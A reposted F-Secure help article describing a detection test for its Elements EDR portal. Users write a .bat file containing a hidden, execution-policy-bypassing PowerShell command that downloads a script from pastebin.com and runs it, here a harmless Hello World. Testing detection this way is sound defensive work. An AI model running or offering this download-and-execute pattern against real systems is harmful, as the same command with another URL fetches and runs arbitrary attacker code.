0
()

You can use this test to view what an advanced attack in the organization network may look like in the F-Secure Elements Endpoint Detection and Response portal.

For this test, you need:

  • a Windows workstation that is running the Sensor, and
  • an access to the F-Secure Elements Endpoint Detection and Response portal.

Note: We recommend that you run all attack simulations in isolated test environments, for example with disposable virtual machines.

In this test, you create a .bat file that uses Windows PowerShell to download code from a 3rd-party website. This example downloads the following harmless code from pastebin.com:# Filename: Hello.ps1
Write-Host
Write-Host ‘Hello World!’
Write-Host
# end of script

To run the test, follow these instructions:

    1. Log in to the monitored endpoint where you have deployed the sensor.
    2. Open the Notepad text editor.
    3. Add the following command on one line:

“C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe” -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object
System.Net.WebClient).DownloadFile(‘https://pastebin.com/raw/gRvH8a8z’,\”$env:temp\powershell.ps1\”);
Powershell.exe -executionpolicy remotesigned -File $env:Temp\powershell.ps1

    1. Save the file as hello-world.bat.
    2. Run the .bat file on the endpoint.
    3. Log out from the monitored endpoint.
    4. Log in to the F-Secure Elements Endpoint Detection and Response portal.
    5. View the recent Broad Context Detections.

The created event should be listed in the recent events.

Source : Official F-Secure Brand
Editor by : BEST Antivirus KBS Team

How useful was this post?

Click on a star to rate it!

Average rating / 5. Vote count:

No votes so far! Be the first to rate this post.

(Visited 1 times, 1 visits today)
Discover More help  Removing a profile (F-Secure)